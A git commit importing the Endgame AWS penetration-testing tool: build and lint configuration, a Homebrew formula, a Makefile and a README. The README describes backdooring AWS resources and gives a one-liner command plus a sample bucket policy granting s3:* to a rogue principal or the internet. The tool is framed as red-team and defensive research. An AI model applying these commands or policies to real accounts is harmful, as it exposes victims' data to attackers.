Import the Endgame source tree (mirror of the upstream Salesforce repository)

volticamars 2021-03-16 02:14:28 +01:00
commit 5835c30090
181 changed files with 11376 additions and 0 deletions

72
.gitignore vendored Normal file

@@ -0,0 +1,72 @@
# IDEs
.idea
.vscode
# Mac OS X
.DS_Store
# Serverless framework
.serverless
.requirements.zip
node_modules/
# Working directories
tmp
!.gitkeep
# Python
.coverage
.Python
__pycache__/
*.py[cod]
*$py.class
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
venv/
*.egg-info/
.installed.cfg
*.egg
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/
# HashiCorp
**/.terraform/*
*.plan
*.tfstate
*.tfstate.*
*.tfvars
terraform.tfvars
.vagrant
packer_cache/
*.box
#### Other
*.log
*.pem
#### Repository specific
.notes/*
**/private.tf
.python-version
ecr-policy.json

604
.pylintrc Normal file

@@ -0,0 +1,604 @@
[MASTER]
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-whitelist=
# Add files or directories to the blacklist. They should be base names, not
# paths.
ignore=CVS
# Add files or directories matching the regex patterns to the blacklist. The
# regex matches against base names, not paths.
ignore-patterns=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Specify a configuration file.
#rcfile=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, INFERENCE, INFERENCE_FAILURE, UNDEFINED.
confidence=
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then reenable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=print-statement,
parameter-unpacking,
unpacking-in-except,
old-raise-syntax,
backtick,
long-suffix,
old-ne-operator,
old-octal-literal,
import-star-module-level,
non-ascii-bytes-literal,
raw-checker-failed,
bad-inline-option,
locally-disabled,
file-ignored,
suppressed-message,
useless-suppression,
deprecated-pragma,
use-symbolic-message-instead,
apply-builtin,
basestring-builtin,
buffer-builtin,
cmp-builtin,
coerce-builtin,
execfile-builtin,
file-builtin,
long-builtin,
raw_input-builtin,
reduce-builtin,
standarderror-builtin,
unicode-builtin,
xrange-builtin,
coerce-method,
delslice-method,
getslice-method,
setslice-method,
no-absolute-import,
old-division,
dict-iter-method,
dict-view-method,
next-method-called,
metaclass-assignment,
indexing-exception,
raising-string,
reload-builtin,
oct-method,
hex-method,
nonzero-method,
cmp-method,
input-builtin,
round-builtin,
intern-builtin,
unichr-builtin,
map-builtin-not-iterating,
zip-builtin-not-iterating,
range-builtin-not-iterating,
filter-builtin-not-iterating,
using-cmp-argument,
eq-without-hash,
div-method,
idiv-method,
rdiv-method,
exception-message-attribute,
invalid-str-codec,
sys-max-int,
bad-python3-import,
deprecated-string-function,
deprecated-str-translate-call,
deprecated-itertools-function,
deprecated-types-field,
next-method-defined,
dict-items-not-iterating,
dict-keys-not-iterating,
dict-values-not-iterating,
deprecated-operator-function,
deprecated-urllib-function,
xreadlines-attribute,
deprecated-sys-function,
exception-escape,
comprehension-escape,
fixme,
line-too-long,
duplicate-code,
consider-using-sys-exit,
no-else-return,
too-few-public-methods,
too-many-nested-blocks,
too-many-statements,
too-many-branches,
self-assigning-variable,
pointless-string-statement,
too-many-locals,
consider-using-enumerate,
too-many-arguments,
expression-not-assigned,
invalid-name,
logging-too-many-args,
bad-continuation,
logging-format-interpolation,
f-string-without-interpolation,
logging-fstring-interpolation,
unused-variable,
no-self-use
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
enable=c-extension-no-member
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'error', 'warning', 'refactor', and 'convention'
# which contain the number of messages in each category, as well as 'statement'
# which is the total number of statements analyzed. This score is used by the
# global evaluation report (RP0004).
evaluation=10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10)
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
#msg-template=
# Set the output format. Available formats are text, parseable, colorized, json
# and msvs (visual studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
output-format=text
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit
[LOGGING]
# Format style used to check logging format string. `old` means using %
# formatting, `new` is for `{}` formatting,and `fstr` is for f-strings.
logging-format-style=old
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. Available dictionaries: none. To make it work,
# install the python-enchant package.
spelling-dict=
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether missing members accessed in mixin class should be ignored. A
# mixin class is detected if its name ends with "mixin" (case insensitive).
ignore-mixin-members=yes
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local
# List of module names for which member attributes should not be checked
# (useful for modules/projects where namespaces are manipulated during runtime
# and thus existing member attributes cannot be deduced by static analysis). It
# supports qualified module names, as well as Unix pattern matching.
ignored-modules=
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored. Default to name
# with leading underscore.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=119
# Maximum number of lines in a module.
max-module-lines=1000
# List of optional constructs for which whitespace checking is disabled. `dict-
# separator` is used to allow tabulation in dicts, etc.: {1 : 1,\n222: 2}.
# `trailing-comma` allows a space between comma and closing bracket: (a, ).
# `empty-line` allows space-only lines.
no-space-check=trailing-comma,
dict-separator
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[SIMILARITIES]
# Ignore comments when computing similarities.
ignore-comments=yes
# Ignore docstrings when computing similarities.
ignore-docstrings=yes
# Ignore imports when computing similarities.
ignore-imports=no
# Minimum lines number of a similarity.
min-similarity-lines=4
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style.
#class-attribute-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style.
#variable-rgx=
[STRING]
# This flag controls whether the implicit-str-concat-in-sequence should
# generate a warning on implicit string concatenation in sequences defined over
# several lines.
check-str-concat-over-line-jumps=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=optparse,tkinter.tix
# Create a graph of external dependencies in the given file (report RP0402 must
# not be disabled).
ext-import-graph=
# Create a graph of every (i.e. internal and external) dependencies in the
# given file (report RP0402 must not be disabled).
import-graph=
# Create a graph of internal dependencies in the given file (report RP0402 must
# not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[CLASSES]
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,
_fields,
_replace,
_source,
_make
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=cls
[DESIGN]
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when being caught. Defaults to
# "BaseException, Exception".
overgeneral-exceptions=BaseException,
Exception

18
.readthedocs.yml Normal file

@@ -0,0 +1,18 @@
# Read the Docs configuration file
# See https://docs.readthedocs.io/en/stable/config-file/v2.html for details
# Required
version: 2
mkdocs:
  configuration: mkdocs.yml
  fail_on_warning: false
# Optionally build your docs in additional formats such as PDF and ePub
formats: all
# Optionally set the version of Python and requirements required to build your docs
python:
  version: 3.7
  install:
    - requirements: docs/requirements-docs.txt

105
CODE_OF_CONDUCT.md Normal file

@@ -0,0 +1,105 @@
# Salesforce Open Source Community Code of Conduct
## About the Code of Conduct
Equality is a core value at Salesforce. We believe a diverse and inclusive
community fosters innovation and creativity, and are committed to building a
culture where everyone feels included.
Salesforce open-source projects are committed to providing a friendly, safe, and
welcoming environment for all, regardless of gender identity and expression,
sexual orientation, disability, physical appearance, body size, ethnicity, nationality,
race, age, religion, level of experience, education, socioeconomic status, or
other similar personal characteristics.
The goal of this code of conduct is to specify a baseline standard of behavior so
that people with different social values and communication styles can work
together effectively, productively, and respectfully in our open source community.
It also establishes a mechanism for reporting issues and resolving conflicts.
All questions and reports of abusive, harassing, or otherwise unacceptable behavior
in a Salesforce open-source project may be reported by contacting the Salesforce
Open Source Conduct Committee at ossconduct@salesforce.com.
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of gender
identity and expression, sexual orientation, disability, physical appearance,
body size, ethnicity, nationality, race, age, religion, level of experience, education,
socioeconomic status, or other similar personal characteristics.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy toward other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Personal attacks, insulting/derogatory comments, or trolling
* Public or private harassment
* Publishing, or threatening to publish, others' private information—such as
a physical or electronic address—without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
* Advocating for or encouraging any of the above behaviors
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned with this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project email
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the Salesforce Open Source Conduct Committee
at ossconduct@salesforce.com. All complaints will be reviewed and investigated
and will result in a response that is deemed necessary and appropriate to the
circumstances. The committee is obligated to maintain confidentiality with
regard to the reporter of an incident. Further details of specific enforcement
policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership and the Salesforce Open Source Conduct
Committee.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][contributor-covenant-home],
version 1.4, available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html.
It includes adaptions and additions from [Go Community Code of Conduct][golang-coc],
[CNCF Code of Conduct][cncf-coc], and [Microsoft Open Source Code of Conduct][microsoft-coc].
This Code of Conduct is licensed under the [Creative Commons Attribution 3.0 License][cc-by-3-us].
[contributor-covenant-home]: https://www.contributor-covenant.org (https://www.contributor-covenant.org/)
[golang-coc]: https://golang.org/conduct
[cncf-coc]: https://github.com/cncf/foundation/blob/master/code-of-conduct.md
[microsoft-coc]: https://opensource.microsoft.com/codeofconduct/
[cc-by-3-us]: https://creativecommons.org/licenses/by/3.0/us/

114
HomebrewFormula/endgame.rb Normal file

@@ -0,0 +1,114 @@
class Endgame < Formula
include Language::Python::Virtualenv
desc "Shiny new formula"
homepage "https://git.tcp.direct/volticamars/aws-endgame"
url "https://files.pythonhosted.org/packages/0c/f0/9eced7d6c57483c49db1a5bdbb4061e5f8346a3701bef9354e98b7f3f84e/endgame-0.2.0.tar.gz"
sha256 "6d2833293f51cc899f9a01c84e170ad44e087e5f3ebc8b909f4ca1ffbeef7766"
depends_on "python3"
resource "beautifulsoup4" do
url "https://files.pythonhosted.org/packages/6b/c3/d31704ae558dcca862e4ee8e8388f357af6c9d9acb0cad4ba0fbbd350d9a/beautifulsoup4-4.9.3.tar.gz"
sha256 "84729e322ad1d5b4d25f805bfa05b902dd96450f43842c4e99067d5e1369eb25"
end
resource "boto3" do
url "https://files.pythonhosted.org/packages/79/94/8cdeff002e0c9ab56f88560523036d8efcb7680e02abe2fa4fc8f4bd87c2/boto3-1.17.8.tar.gz"
sha256 "819890e92268d730bdef1d8bac08fb069b148bec21f2172a1a99380798224e1b"
end
resource "botocore" do
url "https://files.pythonhosted.org/packages/62/84/f5415b10f5447fa3323ebf2480fe36985f65da24e2def14fc9a4939a737f/botocore-1.20.8.tar.gz"
sha256 "cd621cdd14a81d2c3c5276516066d9e6ea20a515cf3113a80ad74f3f8b04a093"
end
resource "certifi" do
url "https://files.pythonhosted.org/packages/06/a9/cd1fd8ee13f73a4d4f491ee219deeeae20afefa914dfb4c130cfc9dc397a/certifi-2020.12.5.tar.gz"
sha256 "1a4995114262bffbc2413b159f2a1a480c969de6e6eb13ee966d470af86af59c"
end
resource "chardet" do
url "https://files.pythonhosted.org/packages/ee/2d/9cdc2b527e127b4c9db64b86647d567985940ac3698eeabc7ffaccb4ea61/chardet-4.0.0.tar.gz"
sha256 "0d6f53a15db4120f2b08c94f11e7d93d2c911ee118b6b30a04ec3ee8310179fa"
end
resource "click" do
url "https://files.pythonhosted.org/packages/27/6f/be940c8b1f1d69daceeb0032fee6c34d7bd70e3e649ccac0951500b4720e/click-7.1.2.tar.gz"
sha256 "d2b5255c7c6349bc1bd1e59e08cd12acbbd63ce649f2588755783aa94dfb6b1a"
end
resource "colorama" do
url "https://files.pythonhosted.org/packages/1f/bb/5d3246097ab77fa083a61bd8d3d527b7ae063c7d8e8671b1cf8c4ec10cbe/colorama-0.4.4.tar.gz"
sha256 "5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"
end
resource "contextlib2" do
url "https://files.pythonhosted.org/packages/02/54/669207eb72e3d8ae8b38aa1f0703ee87a0e9f88f30d3c0a47bebdb6de242/contextlib2-0.6.0.post1.tar.gz"
sha256 "01f490098c18b19d2bd5bb5dc445b2054d2fa97f09a4280ba2c5f3c394c8162e"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/ea/b7/e0e3c1c467636186c39925827be42f16fee389dc404ac29e930e9136be70/idna-2.10.tar.gz"
sha256 "b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6"
end
resource "jmespath" do
url "https://files.pythonhosted.org/packages/3c/56/3f325b1eef9791759784aa5046a8f6a1aff8f7c898a2e34506771d3b99d8/jmespath-0.10.0.tar.gz"
sha256 "b85d0567b8666149a93172712e68920734333c0ce7e89b78b3e987f71e5ed4f9"
end
resource "policy-sentry" do
url "https://files.pythonhosted.org/packages/5a/d6/09bd6125cc20eac023ad5b5a8391de709e40d6787b14775e6dbc8c32e96e/policy_sentry-0.11.5.tar.gz"
sha256 "c0ef418e6bd062d21185a51f40ad39b997d7ae5da793d2a8c0ea013c2f15da5c"
end
resource "python-dateutil" do
url "https://files.pythonhosted.org/packages/be/ed/5bbc91f03fa4c839c4c7360375da77f9659af5f7086b7a7bdda65771c8e0/python-dateutil-2.8.1.tar.gz"
sha256 "73ebfe9dbf22e832286dafa60473e4cd239f8592f699aa5adaf10050e6e1823c"
end
resource "PyYAML" do
url "https://files.pythonhosted.org/packages/a0/a4/d63f2d7597e1a4b55aa3b4d6c5b029991d3b824b5bd331af8d4ab1ed687d/PyYAML-5.4.1.tar.gz"
sha256 "607774cbba28732bfa802b54baa7484215f530991055bb562efbed5b2f20a45e"
end
resource "requests" do
url "https://files.pythonhosted.org/packages/6b/47/c14abc08432ab22dc18b9892252efaf005ab44066de871e72a38d6af464b/requests-2.25.1.tar.gz"
sha256 "27973dd4a904a4f13b263a19c866c13b92a39ed1c964655f025f3f8d3d75b804"
end
resource "s3transfer" do
url "https://files.pythonhosted.org/packages/08/e1/3ee2096ebaeeb8c186d20ed16c8faf4a503913e5c9a0e14cd6b8ffc405a3/s3transfer-0.3.4.tar.gz"
sha256 "7fdddb4f22275cf1d32129e21f056337fd2a80b6ccef1664528145b72c49e6d2"
end
resource "schema" do
url "https://files.pythonhosted.org/packages/2b/91/42bc143289fd5f032ab1b01c5da32dc162ae808a585122f27ed5bf67268f/schema-0.7.4.tar.gz"
sha256 "fbb6a52eb2d9facf292f233adcc6008cffd94343c63ccac9a1cb1f3e6de1db17"
end
resource "six" do
url "https://files.pythonhosted.org/packages/6b/34/415834bfdafca3c5f451532e8a8d9ba89a21c9743a0c59fbd0205c7f9426/six-1.15.0.tar.gz"
sha256 "30639c035cdb23534cd4aa2dd52c3bf48f06e5f4a941509c8bafd8ce11080259"
end
resource "soupsieve" do
url "https://files.pythonhosted.org/packages/54/b9/1584ee0cd971ea935447c87bbc9d195d981feec446dd0af799d9d95c9d86/soupsieve-2.2.tar.gz"
sha256 "407fa1e8eb3458d1b5614df51d9651a1180ea5fedf07feb46e45d7e25e6d6cdd"
end
resource "urllib3" do
url "https://files.pythonhosted.org/packages/d7/8d/7ee68c6b48e1ec8d41198f694ecdc15f7596356f2ff8e6b1420300cf5db3/urllib3-1.26.3.tar.gz"
sha256 "de3eedaad74a2683334e282005cd8d7f22f4d55fa690a2a1020a416cb0a47e73"
end
def install
virtualenv_create(libexec, "python3")
virtualenv_install_with_resources
end
test do
false
end
end

11
LICENSE Normal file

@@ -0,0 +1,11 @@
Copyright 2021 Salesforce.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.

91
Makefile Normal file

@@ -0,0 +1,91 @@
SHELL:=/bin/bash

.PHONY: setup-env
setup-env:
	python3 -m venv ./venv && source venv/bin/activate
	python3 -m pip install -r requirements.txt

.PHONY: setup-dev
setup-dev: setup-env
	python3 -m pip install -r requirements-dev.txt

.PHONY: build-docs
build-docs: setup-dev
	mkdocs build

.PHONY: serve-docs
serve-docs: setup-dev
	mkdocs serve --dev-addr "127.0.0.1:8001"

.PHONY: build
build: setup-env clean
	python3 -m pip install --upgrade setuptools wheel
	python3 -m setup -q sdist bdist_wheel

.PHONY: install
install: build
	python3 -m pip install -q ./dist/endgame*.tar.gz
	endgame --help

.PHONY: uninstall
uninstall:
	python3 -m pip uninstall endgame -y
	python3 -m pip uninstall -r requirements.txt -y
	python3 -m pip uninstall -r requirements-dev.txt -y
	python3 -m pip freeze | xargs python3 -m pip uninstall -y

.PHONY: clean
clean:
	rm -rf dist/
	rm -rf build/
	rm -rf *.egg-info
	find . -name '*.pyc' -delete
	find . -name '*.pyo' -delete
	find . -name '*.egg-link' -delete
	find . -name '*.pyc' -exec rm --force {} +
	find . -name '*.pyo' -exec rm --force {} +

.PHONY: test
test: setup-dev
	python3 -m coverage run -m pytest -v

.PHONY: security-test
security-test: setup-dev
	bandit -r ./endgame/

.PHONY: fmt
fmt: setup-dev
	black endgame/

.PHONY: lint
lint: setup-dev
	pylint endgame/

.PHONY: publish
publish: build
	python3 -m pip install --upgrade twine
	python3 -m twine upload dist/*
	python3 -m pip install endgame

.PHONY: count-loc
count-loc:
	echo "If you don't have tokei installed, you can install it with 'brew install tokei'"
	echo "Website: https://github.com/XAMPPRocky/tokei#installation"
	tokei ./* --exclude '**/*.html' --exclude '**/*.json'

.PHONY: terraform-demo
terraform-demo:
	cd terraform && terraform init && terraform apply --auto-approve

.PHONY: terraform-destroy
terraform-destroy:
	cd terraform && terraform destroy --auto-approve

.PHONY: integration-test
integration-test: setup-dev
	python3 -m invoke test.list-resources
	python3 -m invoke test.expose-dry-run
	python3 -m invoke test.expose
	python3 -m invoke test.expose-undo
	make terraform-destroy

438
README.md Normal file

@@ -0,0 +1,438 @@
> **Note:** This is a mirror of the Endgame source code, archived before the upstream Salesforce repository was taken down. All credit goes to the original Salesforce authors. The package can still be installed via pip or Homebrew (see [Installation](#installation) below).
# Endgame
An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire internet 😈
[![Twitter](https://img.shields.io/twitter/url/https/twitter.com/kmcquade3.svg?style=social&label=Follow%20the%20author)](https://twitter.com/kmcquade3)
[![Documentation Status](https://readthedocs.org/projects/endgame/badge/?version=latest)](https://endgame.readthedocs.io/en/latest/?badge=latest)
[![Downloads](https://pepy.tech/badge/endgame)](https://pepy.tech/project/endgame)
<p align="center">
<img src="docs/images/endgame.gif">
</p>
**TL;DR**: `endgame smash --service all` to create backdoors across your entire AWS account - by sharing resources either with a rogue IAM user/role or with the entire Internet.
# Endgame: Creating Backdoors in AWS
Endgame abuses AWS's resource permission model to grant rogue users (or the Internet) access to an AWS account's resources with a single command. It does this through one of three methods:
1. Modifying [resource-based policies](https://endgame.readthedocs.io/en/latest/resource-policy-primer/) (such as [S3 Bucket policies](https://docs.aws.amazon.com/AmazonS3/latest/userguide/WebsiteAccessPermissionsReqd.html#bucket-policy-static-site) or [Lambda Function policies](https://docs.aws.amazon.com/lambda/latest/dg/access-control-resource-based.html#permissions-resource-xaccountinvoke))
2. Resources that can be made public through sharing APIs (such as [Amazon Machine Images (AMIs)](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/sharingamis-explicit.html), [EBS disk snapshots](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-modifying-snapshot-permissions.html), and [RDS database snapshots](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html))
3. Sharing resources via [AWS Resource Access Manager (RAM)](https://docs.aws.amazon.com/ram/latest/userguide/shareable.html)
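For illustration, method 1 boils down to slipping a statement of the following shape into a resource-based policy such as an S3 bucket policy. This is a sketch only - the `Sid`, account ID, and bucket name are placeholders, not necessarily what Endgame itself writes:

```python
# Illustrative only: the kind of statement a resource-exposure attack appends to an
# S3 bucket policy. The Sid, account ID, and bucket name are placeholders.
BACKDOOR_STATEMENT = {
    "Sid": "Backdoor",
    "Effect": "Allow",
    "Principal": {"AWS": "arn:aws:iam::999988887777:user/evil"},  # or "*" for the whole internet
    "Action": "s3:*",
    "Resource": ["arn:aws:s3:::victim-bucket", "arn:aws:s3:::victim-bucket/*"],
}
```

Once such a statement is in place, the rogue principal (or everyone, if `"*"` is used) gets `s3:*` on the bucket without any change to the victim account's IAM policies.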
Endgame was created to:
* Push [AWS](https://endgame.readthedocs.io/en/latest/recommendations-to-aws/) to improve coverage of AWS Access Analyzer so AWS users can protect themselves.
* Show [blue teams](#recommendations-to-blue-teams) and developers what kind of damage can be done by overprivileged/leaked accounts.
* Help red teams to demonstrate impact of their access.
Endgame demonstrates (with a bit of shock and awe) how simple human errors in excessive permissions (such as granting `s3:*` access instead of `s3:GetObject`) can be abused by attackers. These are not new attacks, but AWS's ability to **detect** _and_ **prevent** these attacks falls short of what customers need to protect themselves. This is what inspired us to write this tool. Follow the [Tutorial](#tutorial) and observe how you can expose resources across **17 different AWS services** to the Internet in a matter of seconds.
